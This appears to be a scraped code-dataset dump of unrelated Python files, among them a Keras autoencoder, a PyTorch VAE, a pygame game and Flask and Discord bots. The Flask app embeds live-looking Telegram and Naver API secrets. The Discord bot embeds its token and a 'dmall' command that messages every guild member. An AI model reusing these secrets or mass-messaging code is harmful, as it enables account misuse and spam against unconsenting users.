Primitive.from_data(data['value'])\n artist = cls(primitive)\n return artist\n\n def to_data(self):\n return self.primitive.to_data()\n\n def clear_layer(self):\n \"\"\"Clear the main layer of the artist.\"\"\"\n if self.layer:\n compas_rhino.clear_layer(self.layer)\n else:\n compas_rhino.clear_current_layer()\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == '__main__':\n pass\n","sub_path":"src/compas_rhino/artists/primitiveartist.py","file_name":"primitiveartist.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"23583105","text":"from sklearn.cluster import KMeans\nimport keras\nfrom keras import Sequential, Model\nfrom keras.layers import Conv2D, UpSampling2D, MaxPool2D, Dense, Reshape, Flatten\nfrom keras import backend as K\nimport glob\nfrom PIL import Image\nfrom PIL.ImageOps import mirror\nimport matplotlib.pyplot as plt\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport shutil\n\ntrain_df = pd.read_csv(\"input/train_relationships.csv\")\n\nM = 1000\ni = 0\nimage_datas = list()\nfor path in train_df.p1:\n for f in glob.glob('input/train/' + path + \"/*.jpg\", recursive=True):\n temp = Image.open(f)\n image = temp.copy()\n image_datas.append(image)\n temp.close()\n i += 1\n if i == M:\n break\n if i == M:\n break\n\nnp.random.shuffle(image_datas)\n\nfor i in range(len(image_datas)):\n image_datas[i] = image_datas[i].resize((64, 64), Image.ANTIALIAS)\n\nfor i in range(len(image_datas)):\n image_datas[i] = np.asarray(image_datas[i]) / 255.\nimage_datas = np.array(image_datas)\n\nencoder = Sequential([\n Conv2D(filters=32, kernel_size=18, strides=1, activation=\"relu\", padding=\"same\", input_shape=(64, 64, 3)),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Conv2D(filters=64, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Conv2D(filters=128, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Flatten(),\n Dense(200),\n Dense(100),\n Dense(20),\n Dense(8)\n])\ndecoder = Sequential([\n Dense(20, input_shape=(1, 8)),\n Dense(100),\n Dense(200),\n Dense(8192),\n Reshape((8, 8, 128)),\n UpSampling2D(2),\n Conv2D(filters=64, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n UpSampling2D(2),\n Conv2D(filters=32, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n UpSampling2D(2),\n Conv2D(filters=3, kernel_size=18, strides=1, activation=\"sigmoid\", padding=\"same\")\n])\nautoencoder = Sequential([encoder, decoder])\n\nautoencoder.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"binary_crossentropy\"])\n\nbatch_size = 32\nepochs = 10\nlearning_rate = 0.1\n\nhistory = autoencoder.fit(image_datas.reshape(image_datas.shape), image_datas.reshape(-1, 64, 64, 3), batch_size, epochs, validation_split=0.2, verbose=1)\n\nplt.figure(figsize=(10,10))\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\nencoder.summary()\ndecoder.summary()\n\nn_img = 4\nind = np.random.choice(range(len(image_datas)), n_img)\npred = autoencoder.predict(image_datas[ind], batch_size)\n\nf, ax = plt.subplots(2, n_img, figsize=(10, 10))\nfor i in range(n_img):\n ax[0][i].imshow(image_datas[ind[i]])\n ax[1][i].imshow(pred[i])\n\n # import winsound\n # frequency = 440 # Set Frequency To 2500 Hertz\n # duration = 1000 # Set Duration To 1000 ms == 1 second\n # winsound.Beep(frequency, duration)\n # winsound.Beep(440, 1000)\n","sub_path":"trials.py","file_name":"trials.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"314179730","text":"from flask import Flask, render_template, request\nfrom pprint import pprint\nimport requests\n\napp = Flask(__name__)\n\n# 요청을 위한 기본 준비\ntoken = '805457410:AAGhgJeP4X79yj8TKWsrr_shUYbvjMWEZUo'\nchat_id = '749251074'\nnaver_client_id = 'bej3naFebiOt4saB3r0h'\nnaver_client_secret = '2u4UN7QruP'\n\napp_url = f'https://api.telegram.org/bot{token}'\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/write')\ndef write():\n return render_template('write.html')\n\n@app.route('/send')\ndef send():\n #1. 사용자가 보낸 메시지를 받아서 text 변수에 저장하자\n text = request.args.get('msg')\n\n #2. Telegram bot이 chat_id를 가진 사람에게 메시지를 보낸다.\n message_url = f'{app_url}/sendMessage?chat_id={chat_id}&text={text}'\n\n #3. 텔레그램 ���버로 메시지 전송\n requests.get(message_url)\n\n return render_template('send.html')\n\n@app.route('/telegram', methods=['POST'])\ndef telegram():\n telegram_response = request.get_json()\n # pprint(telegram_response)\n # print(request)\n\n if telegram_response.get('message') is not None:\n chat_id = telegram_response.get('message').get('chat').get('id')\n text = telegram_response.get('message').get('text')\n # requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n\n if text[0:4] == '/번역 ':\n headers = {\n 'X-Naver-Client-Id': naver_client_id,\n 'X-Naver-Client-Secret': naver_client_secret\n }\n\n data = {\n 'source': 'ko',\n 'target': 'ja',\n 'text': text[4:]\n }\n\n papage_response = requests.post(\n 'https://openapi.naver.com/v1/papago/n2mt',\n headers=headers,\n data=data\n ).json()\n\n # pprint(papage_response)\n text = papage_response.get('message').get('result').get('translatedText')\n requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n return '', 200\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"SSAFY/Python_lecture/lectures-justin-master/StartCamp/telegram_bot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"611883324","text":"bdata = bytes(range(0,256))\nprint(len(bdata))\nprint(bdata[255])\n\nfout = open('bfile.raw','wb')\nprint(fout.write(bdata),'bytes writed!') #write는 파일에 쓴 바이트 수를 반환함.\nfout.close()\n\n######################################################\nfout = open ('bfile.raw','wb')\nsize = len (bdata)\nprint(size,'bytes!!')\noffset = 0\nchunk = 100\nwhile True:\n if offset > size :\n break\n fout.write(bdata[offset:offset+chunk])\n offset += chunk\nfout.close()\n\n#######################################################\nfin = open('bfile.raw','rb')\nbdata_read = fin.read()\nprint(len(bdata_read))\nfin.close()\n\n########################################################\n\nfin=open('bfile.raw','rb')\nprint(fin.tell())\nfin.seek(255) #현재 오프셋을 반환함!\nprint(fin.tell())\nbdata_read = fin.read()\nprint('current length of bdata_read =',len(bdata_read))\nprint(bdata_read[0])\n\n#######################################################\nimport os\nfin = open('bfile.raw','rb')\nfin.seek(-1,os.SEEK_END)\nprint(fin.tell())\nbdata_read = fin.read()\nprint(len(bdata_read))\nprint(bdata_read[0])\n\nfin.seek(254,os.SEEK_SET)\nprint(fin.tell())\nfin.seek(1,os.SEEK_CUR)\nprint(fin.tell())\nfin.seek(-5,os.SEEK_END)\nprint(fin.tell())\nbdata_read = fin.read()\nprint('===================')\nfor i in bdata_read :\n print(i)\n\n\n","sub_path":"Ch08/08_02_bfile_handler.py","file_name":"08_02_bfile_handler.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"148018864","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fundraising', '0031_auto_20150604_0813'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='donation',\n old_name='amount',\n new_name='subscription_amount',\n ),\n migrations.AlterField(\n model_name='donation',\n name='subscription_amount',\n field=models.DecimalField(blank=True, null=True, decimal_places=2, max_digits=9),\n preserve_default=True,\n ),\n migrations.RemoveField(\n model_name='donation',\n name='stripe_charge_id',\n ),\n ]\n","sub_path":"fundraising/migrations/0032_auto_20150604_0813.py","file_name":"0032_auto_20150604_0813.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"346881562","text":"import discord\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = 'r!')\n\n@client.event\nasync def on_ready():\n print('Ready!')\n \n\n@client.command()\nasync def dmall(ctx, global_guildid : int,*, message):\n master = [391425164123963394,600471112140324864]\n login_status = 0\n test = ctx.author.id\n for a in master:\n if test == a:\n login_status = login_status + 1\n if login_status == 1:\n guild = client.get_guild(int(global_guildid))\n msg = await ctx.channel.send('> 메시지 전송 작업이 시작되었습니다.')\n su = 0\n fa = 0\n sul = 0\n user = []\n for channelz in guild.members:\n print(channelz)\n user.append(channelz.name)\n print(user)\n for channelz in guild.members:\n \n try:\n channel2 = await channelz.create_dm()\n await channel2.send(message)\n su = su + 1\n except:\n fa = fa + 1\n pass\n try:\n sul = sul + 1\n sui = user[sul]\n print(sui)\n msg1 = '> 메시지를 전송중입니다. \\n > 전송중인 유저 : {0} \\n > {1}명에게 메시지가 전송되었습니다\\n > {2}명에게 메시지가 전송되지 않았습니다.'.format(sui,su,fa)\n await msg.edit(content=msg1)\n except:\n pass\n msg2 = '> 메시지 전송이 완료되었습니다. \\n > 총 {0}명에게 메시지가 전송되었으며\\n > {1}명에게 메시지가 전송되지 않았습니다.'.format(su,fa)\n await msg.edit(content=msg2)\n else:\n await ctx.channel.send('[Error] 등록된 사용자가 아닙니다.')\nt = 'NjgxMzA2NjI4NzY2OTU3NTc2.XlNGUg.xayXw8PM1KKct7KC1WZMu7pBAc0'\nclient.run(t)\n\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"417197268","text":"import sys\n\npng = sys.argv[1]\npng = png.lower().endswith(\".png\")\nprint(png)\n\n\"\"\"\nPNG ИЗОБРАЖЕНИЕ?\nНапишите программу, которая первым аргументом командной строки\nпринимает название файла, а после выводит True если это png изображение, \nи False в противном случае.\nОпределять png это или нет нужно по расширению файла.\nУчитывайте, что имя может быть набрано в разных регистрах.\n> python program.py photo.png\n> True\n> python program.py photo.jpg\n> False\n> python program.py ROOM.PNG\n> True\n\"\"\"","sub_path":"shultais_courses/data_types/string_methods_string_conditions/png_picture.py","file_name":"png_picture.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"141842686","text":"import argparse\nimport numpy as np\nimport os\nfrom utils_vae import img_tile, mnist_reader\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epoch\", type=int, default=40)\n parser.add_argument(\"--nz\", type=int, default=20)\n parser.add_argument(\"--layersize\", type=int, default=400)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--lr\", type=float, default=0.0001)\n parser.add_argument(\"--b1\", type=float, default=0.9)\n parser.add_argument(\"--b2\", type=float, default=0.999)\n parser.add_argument(\"--e\", type=float, default=1e-8)\n parser.add_argument(\"--bsize\", type=int, default=64)\n return parser.parse_args()\n\nargs = parse_args()\n\n\nnp.random.seed(111)\n\nclass VAE(nn.Module):\n def __init__(self, numbers):\n super().__init__()\n\n self.numbers = numbers\n\n self.epochs = args.epoch\n self.batch_size = args.bsize\n self.learning_rate = args.lr\n self.decay = 0.001\n self.nz = args.nz\n self.layersize = args.layersize\n\n self.img_path = \"./images\"\n if not os.path.exists(self.img_path):\n os.makedirs(self.img_path)\n\n # Xavier initialization is used to initialize the weights\n # init encoder weights\n self._e_W0 = np.random.randn(784, self.layersize).astype(np.float32) * np.sqrt(2.0/(784))\n self._e_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._e_W_mu = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_mu = np.zeros(self.nz).astype(np.float32)\n\n self._e_W_logvar = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_logvar = np.zeros(self.nz).astype(np.float32)\n\n # init decoder weights\n self._d_W0 = np.random.randn(self.nz, self.layersize).astype(np.float32) * np.sqrt(2.0/(self.nz))\n self._d_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._d_W1 = np.random.randn(self.layersize, 784).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._d_b1 = np.zeros(784).astype(np.float32)\n\n #\n self.e_W0 = nn.Parameter(torch.from_numpy(self._e_W0).float())\n self.e_b0 = nn.Parameter(torch.from_numpy(self._e_b0).float())\n self.e_W_mu = nn.Parameter(torch.from_numpy(self._e_W_mu).float())\n self.e_b_mu = nn.Parameter(torch.from_numpy(self._e_b_mu).float())\n self.e_W_logvar = nn.Parameter(torch.from_numpy(self._e_W_logvar).float())\n self.e_b_logvar = nn.Parameter(torch.from_numpy(self._e_b_logvar).float())\n\n self.d_W0 = nn.Parameter(torch.from_numpy(self._d_W0).float())\n self.d_b0 = nn.Parameter(torch.from_numpy(self._d_b0).float())\n self.d_W1 = nn.Parameter(torch.from_numpy(self._d_W1).float())\n self.d_b1 = nn.Parameter(torch.from_numpy(self._d_b1).float())\n\n # init Adam optimizer\n self.b1 = args.b1\n self.b2 = args.b2\n self.e = args.e\n self.m = [0] * 10\n self.v = [0] * 10\n self.t = 0\n\n def encoder(self, img):\n #self.e_logvar : log variance\n #self.e_mean : mean\n\n e_input = np.reshape(img, (self.batch_size,-1))\n e_input = torch.from_numpy(e_input).float()\n\n e_h0_l = torch.matmul(e_input, self.e_W0) + self.e_b0\n e_h0_a = nn.LeakyReLU(negative_slope=0.01)(e_h0_l)\n\n e_logvar = torch.matmul(e_h0_a, self.e_W_logvar) + self.e_b_logvar\n e_mu = torch.matmul(e_h0_a, self.e_W_mu) + self.e_b_mu\n\n return e_mu, e_logvar\n\n def decoder(self, z):\n #self.d_out : reconstruction image 28x28\n\n z = z.view(self.batch_size, self.nz)\n\n d_h0_l = torch.matmul(z, self.d_W0) + self.d_b0\n d_h0_a = torch.relu(d_h0_l)\n\n d_h1_l = torch.matmul(d_h0_a, self.d_W1) + self.d_b1\n d_h1_a = torch.sigmoid(d_h1_l)\n\n d_out = d_h1_a.view(self.batch_size, 28, 28, 1)\n\n return d_out\n\n def forward(self, x):\n #Encode\n mu, logvar = self.encoder(x)\n\n #use reparameterization trick to sample from gaussian\n sample_z = mu + torch.exp(logvar * .5) * torch.from_numpy(np.random.standard_normal(size=(self.batch_size, self.nz))).float()\n\n decode = self.decoder(sample_z)\n\n return decode, mu, logvar, None, sample_z\n\n def train(self, optimizer):\n\n #Read in training data\n trainX, _, train_size = mnist_reader(self.numbers)\n\n np.random.shuffle(trainX)\n\n #set batch indices\n batch_idx = train_size//self.batch_size\n batches_per_epoch = min(10, batch_idx)\n # batches_per_epoch = batch_idx\n del batch_idx\n\n total_loss = 0\n total_kl = 0\n total = 0\n\n for epoch in range(self.epochs):\n for idx in range(batches_per_epoch):\n # prepare batch and input vector z\n train_batch = trainX[idx*self.batch_size:idx*self.batch_size + self.batch_size]\n #ignore batch if there are insufficient elements\n if train_batch.shape[0] != self.batch_size:\n break\n\n ################################\n # Forward Pass\n ################################\n\n out, mu, logvar, _, sample_z = self(train_batch)\n\n # Reconstruction Loss\n rec_loss = nn.BCELoss(reduction='sum')(out, torch.from_numpy(train_batch).float())\n\n #K-L Divergence\n # kl = -0.5 * np.sum(1 + logvar - np.power(mu, 2) - np.exp(logvar))\n kl = -0.5 * torch.sum(1 + logvar - mu ** 2 - torch.exp(logvar))\n\n loss = rec_loss + kl\n loss = loss / self.batch_size\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n rec_loss = rec_loss.item()\n kl = kl.item()\n\n #Loss Recordkeeping\n total_loss += rec_loss / self.batch_size\n total_kl += kl / self.batch_size\n total += 1\n\n self.img = np.squeeze(out.data.numpy(), axis=3) * 2 - 1\n\n print(\"Epoch [%d] Step [%d/%d] RC Loss:%.4f KL Loss:%.4f lr: %.4f\"%(\n epoch, idx, batches_per_epoch, rec_loss / self.batch_size, kl / self.batch_size, self.learning_rate))\n\n sample = np.array(self.img)\n\n #save image result every epoch\n img_tile(sample, self.img_path, epoch, idx, \"res\", True)\n\n\nif __name__ == '__main__':\n\n # Adjust the numbers that appear in the training data. Less numbers helps\n # run the program to see faster results\n numbers = [1, 2, 3]\n model = VAE(numbers)\n\n for name, p in model.named_parameters():\n print(name, p.shape)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, betas=(args.b1, args.b2), eps=args.e)\n model.train(optimizer)\n","sub_path":"torchvae.py","file_name":"torchvae.py","file_ext":"py","file_size_in_byte":7034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"135642264","text":"from Common.TradingDay import TradingDay\nfrom Common.OracleConnector import OracleConnector\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\n\nclass marketdata(object):\n def __init__(self, startdate):\n # get trading days\n td = TradingDay()\n enddate = td.getLastTradingDay()\n self.tradedays = td.getDuration(startdate, enddate)\n\n # get stock list\n oc = OracleConnector()\n self.connection = oc.getConn()\n sqls_stocklist = \"select F16_1090,OB_OBJECT_NAME_1090,F23_1090,F27_1090 from WIND.TB_OBJECT_1090 where F4_1090='A'and F19_1090='0' and F21_1090='1' order by F16_1090 asc\"\n self.df_stocklist = pd.read_sql(sql=sqls_stocklist, con=self.connection)\n\n def getMarketData(self, count):\n stocklist = self.df_stocklist['F16_1090']\n df_price = pd.DataFrame()\n df_price['TRADE_DT'] = self.tradedays\n # print(df_price)\n\n for stock in stocklist[:count]:\n print(stock)\n sqls = \"\"\"select F2_1425,F4_1425,F5_1425,F6_1425,F7_1425,F8_1425,F9_1425 from WIND.TB_OBJECT_1425, WIND.TB_OBJECT_1090 where F1_1425=F2_1090 and f16_1090 ='%s'and F2_1425> '20190101' and F4_1090= 'A' order by F2_1425 asc\"\"\" \\\n % stock\n df_stock = pd.read_sql(sql=sqls, con=self.connection)\n stock_temp = '%s' % stock\n df_price[stock_temp] = df_stock['F4_1425']\n\n # df_price.to_csv('D:\\\\app\\\\test.csv', sep=',', header=True, index=True)\n print(df_price)\n\n\nclass calculation(object):\n def __init__(self):\n pass\n\n def closeprice(self,k1,k2,k3,decay,combo,k0):\n # df = pd.read_csv('D:\\\\app\\\\matlab_comparison\\\\close.csv')\n df = pd.read_csv('/home/PerformanceAnalysis/Performance/AccountMonitor/Others/close.csv')\n # print(df)\n matrix = df.as_matrix()\n size = np.shape(matrix)\n [rows, cols] = size\n matrix_temp = np.zeros(size)\n # print(matrix_temp)\n\n tic = datetime.now()\n for i in range(cols):\n for j in range(rows-k0, rows):\n x1 = matrix[j - k1 + 1:j + 1, i]\n x2 = matrix[j - k2 - k1 + 1:j - k2 + 1, i]\n x3 = matrix[j - k3 - k1 + 1:j - k3 + 1, i]\n y1 = x1 / x2\n y2 = x1 / x3\n # print(x1, x2, x3)\n\n corr = np.corrcoef(y1, y2)\n # print(corr)\n\n matrix_temp[j, i] = -corr[0][1]\n print(matrix_temp)\n toc = datetime.now()\n print('Processing time: %f seconds' % (toc - tic).total_seconds())\n\nif __name__ == '__main__':\n # startdate = '20190102'\n # mkt = marketdata(startdate)\n # mkt.getMarketData(100)\n\n cal = calculation()\n cal.closeprice(5, 1, 13, 1, 1, 1422)\n","sub_path":"Others/testets.py","file_name":"testets.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"37639442","text":"# Gello game\n# Created by djengineer 2018-2020\n\nimport pygame\nimport time\nfrom random import randint\n\npygame.init()\npygame.font.init()\nscreenwidth = 1024\nscreenheight = 500\nsize = (screenwidth,screenheight)\nscreen = pygame.display.set_mode(size)\nbgcolor = (255,255,255)\npygame.display.set_caption(\"move and bounce a ball\")\n\n# Initialize variables\n########## initialize all button states ##########\nis_key_pressed = {\"up\" : False,\"down\" : False,\"left\" : False,\"right\" : False}\nfinished = False\nstart = False\nmain_menu = True\ngame_over = False\n\n#initialize functions here\ndef listen_key_press():\n global start\n global main_menu\n global game_over\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start = not start\n main_menu = not main_menu\n if game_over == True:\n game_over = not game_over\n main_menu = True\n start = False\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = True\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = True\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = True\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = True\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = False\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = False\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = False\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = False\n\n\n\n#initialize class here\nclass enemy:\n def __init__(self,name,speed,color,position,width):\n self.name = name\n self.speed = speed\n self.color = color\n self.position = position\n self.width = width\n self.direction = self.set_dir()\n def set_dir(self):\n #instead of lists, we use a dictionary here\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n while move_direction[\"X\"] == 0 and move_direction[\"Y\"] == 0:\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n return move_direction\n def movement_controller(self):\n if self.position[0] < screenwidth and self.position[0] > 0 and self.position[1] < screenheight and self.position[1] > 0:\n self.position[0] += self.direction[\"X\"]\n self.position[1] += self.direction[\"Y\"]\n self.boundary_controller()\n def boundary_controller(self):\n if self.position[0] <= 0: #left screen boundary\n #print(\"Left Bound\")\n self.position[0] += 5\n self.position[1] += 0\n self.direction = self.set_dir()\n if self.position[0] >= screenwidth: #right screen boundary\n #print(\"Right Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n if self.position[1] <= 0: #top screen boundary\n #print(\"Top Bound\")\n self.position[0] += 0\n self.position[1] += 5\n self.direction = self.set_dir()\n if self.position[1] >= screenheight: #bottom screen boundary\n #print(\"Bottom Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def collision_detection(self):\n global game_over\n global start\n #Assuming single player only. Need more loops like enemy ball if more than one player\n #if abs(p1.position[0] - self.position[0] < self.width > 0) and abs(p1.position[1] - self.position[1] < self.width > 0):\n # print(self.name+\" Collide\")\n x = abs(p1.position[0] - self.position[0])\n y = abs(p1.position[1] - self.position[1])\n if x < self.width > 0 and y < self.width > 0:\n #reset coordinate of this collided ball, if not game cannot continue\n #self.position = [randint(0,screenwidth),randint(0,screenheight)]\n self.position = [screenwidth,screenheight]\n game_over = True\n start = False\n def all_play_functions(self):\n self.draw()\n self.movement_controller()\n self.boundary_controller()\n self.collision_detection()\n\n\nclass player:\n def __init__(self,name,position,color,width,speed):\n self.name = name\n self.position = position\n self.color = color\n self.width = width\n self.speed = speed\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def ball_movement_controller(self):\n # pygame's position starts from the TOP LEFT of the screen surface at (0,0)\n # X +1 will move it rightwards. How about X -1?\n # Y +1 will move it downwards. How about Y -1?\n # when up key pressed, y-coordinate -1 for as long as the key is pressed.\n if is_key_pressed[\"up\"] == True and self.position[1]>=0:\n self.position[1] -= self.speed\n if is_key_pressed[\"down\"] == True and self.position[1] <= screenheight:\n self.position[1] += self.speed\n if is_key_pressed[\"left\"] == True and self.position[0]>=0:\n self.position[0] -= self.speed\n if is_key_pressed[\"right\"] == True and self.position[0] <= screenwidth:\n self.position[0] += self.speed\n def all_player_functions(self):\n self.draw()\n self.ball_movement_controller()\n \n#load classes here\n#player\np1_ball_pos=[60,70]\np1_ball_color=(60,20,10)\np1_ball_width = 20\np1_ball_speed = 3\np1 = player(\"p1\",p1_ball_pos,p1_ball_color,p1_ball_width,p1_ball_speed)\n#enemy(name,speed,color,position,width,direction)\nenemy_count = 10\nmax_enemy_speed = 1\nenemy_obj_list = []\n\n\n# e1 starts at index 0\nfor x in range(0,enemy_count):\n width = 20\n color = (randint(0,255),randint(0,255),randint(0,255))\n position = [randint(0,screenwidth),randint(0,screenheight)]\n speed = randint(1,max_enemy_speed)\n enemy_obj_list.append(enemy(\"e\"+str(x+1),speed,color,position,width))\n\n\n##### Game Loop #####\nwhile finished == False:\n screen.fill(bgcolor)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n listen_key_press()\n if main_menu == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Press Space to Start\",1,(0,0,0))\n screen.blit(title,(100,80))\n if start == True and main_menu == False:\n ## Load Enemies in Game Loop\n for enemy in enemy_obj_list:\n enemy.all_play_functions()\n ## Load player 1 in Game Loop\n p1.all_player_functions()\n if game_over == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Game Over. Press Space to Main Menu.\",1,(0,0,0))\n screen.blit(title,(100,80))\n for enemy in enemy_obj_list:\n enemy.position = [screenheight,screenwidth];\n pygame.display.flip()\nwhile finished == True:\n pygame.quit()\n","sub_path":"GelloGame.py","file_name":"GelloGame.py","file_ext":"py","file_size_in_byte":7262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316764094","text":"'''\nName: Sai Venkatesh Kurella\nCampus ID: VR62250\nCMSC 678 -Introduction to Machine Learning\nHomework-2\n\n'''\n\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport matplotlib.pyplot as plot\nfrom random import random,shuffle,sample\nfrom operator import itemgetter\n\n\ndef accuracy(testdata,actual_label,weights,bias): #accuracy function\n correct = 0\n for i in range(len(testdata)):\n pred = prediction(testdata[i],weights,bias)\n if pred == actual_label[i][0]: correct += 1\n return correct/float(len(testdata))*100\n\ndef prediction(inputs,weights,bias): #prediction fuction that handles inputs and weights\n activation = 0\n for input,weight in zip(inputs,weights):\n activation += input*weight + bias\n if activation > 0:\n return 1\n else:\n return -1\n\ndef perceptron(train_data,train_label,test_data,test_label,iteration): #perceptron function\n session = tf.compat.v1.Session()\n data_train = tf.compat.v1.placeholder(dtype=tf.float32,shape = [28*28])\n label_train = tf.compat.v1.placeholder(dtype= tf.float32,shape = [1])\n weight = tf.compat.v1.placeholder(dtype=tf.float32,shape=[28*28])\n\n weight = tf.multiply(data_train,label_train)\n\n weights = np.zeros(28*28)\n bias = 0\n for i in range(0,iteration):\n for j in range(0,len(train_data)):\n predict = prediction(train_data[j],weights,bias)\n if predict != train_label[j][0]:\n weights += session.run(weight,feed_dict={data_train:train_data[j],label_train:train_label[j]})\n bias += train_label[j][0]\n\n return accuracy(test_data,test_label,weights,bias),weights\n\ndef extract_data(train_images,train_labels,test_images,test_labels,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num1's\n if num_count < 500 and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num2's\n if num_count < 500 and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num_count += 1\n num_count = 0\n #Testing data\n for i in range(len(test_labels)):\n if num_count < 500 and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(test_labels)):\n #extract only num2's\n if num_count < 500 and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num_count += 1\n return image_train,label_train,image_test,label_test\n\ndef extract_data_shuffled(train_images,train_labels,test_images,test_labels,count,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num1_count,num2_count = 0,0\n for i in range(len(train_labels)):\n #extract only num1's\n if num1_count < count and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num1_count += 1\n #extract only num2's\n if num2_count < count and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num2_count += 1\n\n #shuffle training data\n train = list(zip(image_train,label_train))\n shuffle(train)\n image_train, label_train = zip(*train)\n\n #Testing data\n num1_count,num2_count = 0,0\n for i in range(len(test_labels)):\n if num1_count < count and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num1_count += 1\n #extract only num2's\n if num2_count < count and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num2_count += 1\n #shuffle testing data\n test = list(zip(image_test,label_test))\n shuffle(test)\n image_test, label_test = zip(*test)\n\n return image_train,label_train,image_test,label_test\n\ndef accuracy_iteration(train_data,train_label,test_data,test_label,iteration,num1,num2):\n\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"accuracy_iteration%s_%s%s.png\" 